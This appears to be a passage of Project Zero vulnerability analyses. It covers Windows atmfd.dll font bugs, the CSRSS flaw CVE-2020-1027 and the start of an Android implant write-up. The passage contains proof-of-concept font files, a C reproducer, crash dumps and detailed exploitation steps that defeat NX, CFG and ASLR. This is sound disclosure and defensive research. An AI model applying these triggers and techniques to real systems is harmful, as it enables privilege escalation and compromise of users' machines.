On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];

  }

  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;

    }

    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];

    }

  }

  return 0;

}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...

RSP + 0x30

ptrs[0]

RSP + 0x38

ptrs[1]

RSP + 0x40

saved RDI

RSP + 0x48

return address

RSP + 0x50

values[0 .. 1]

RSP + 0x58

saved RBX

RSP + 0x60

saved RSI

...

The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy

ATMFD+0x22144:

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);

  }

  return 0;

}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    

PPE at FFFFF6FB7DBF2000

contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;

  }

  [...]

}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    if (num_master >= 16) {

      return -4;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  [...]

}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;

      }

      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;

    }

  }

}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity

sxs!CNodeFactory::CreateNode

sxs!XMLParser::Run

sxs!SxspIncorporateAssembly

sxs!SxspCloseManifestGraph

sxs!SxsGenerateActivationContext

sxssrv!BaseSrvSxsCreateActivationContextFromStructEx

sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =

      CreateCtxParams->ApplicationName.Buffer;

} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;

  }

  GenActCtxParams.ApplicationNameBuffer = StringBuffer;

}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {

  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);

} else {

  FusionpTraceAllocFailure(v14);

  SetLastError(0xE);

  goto error;

}

if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;

}

Ultimately, sxs!CNodeFactory::

XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;

SetLastError(0);

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,

                                           &IdentityNameBuffer,

                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;

}

if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;

}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;

  UNICODE_STRING FullDllName;

  UNICODE_STRING BaseDllName;

  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;

}

[...]

if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =

      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =

    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "

    "processorArchitecture='amd64'/>"

    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =

  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"

  L"d761caeca23d64a2.manifest";

const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);

  }

  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);

}

int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);

}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3,  is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

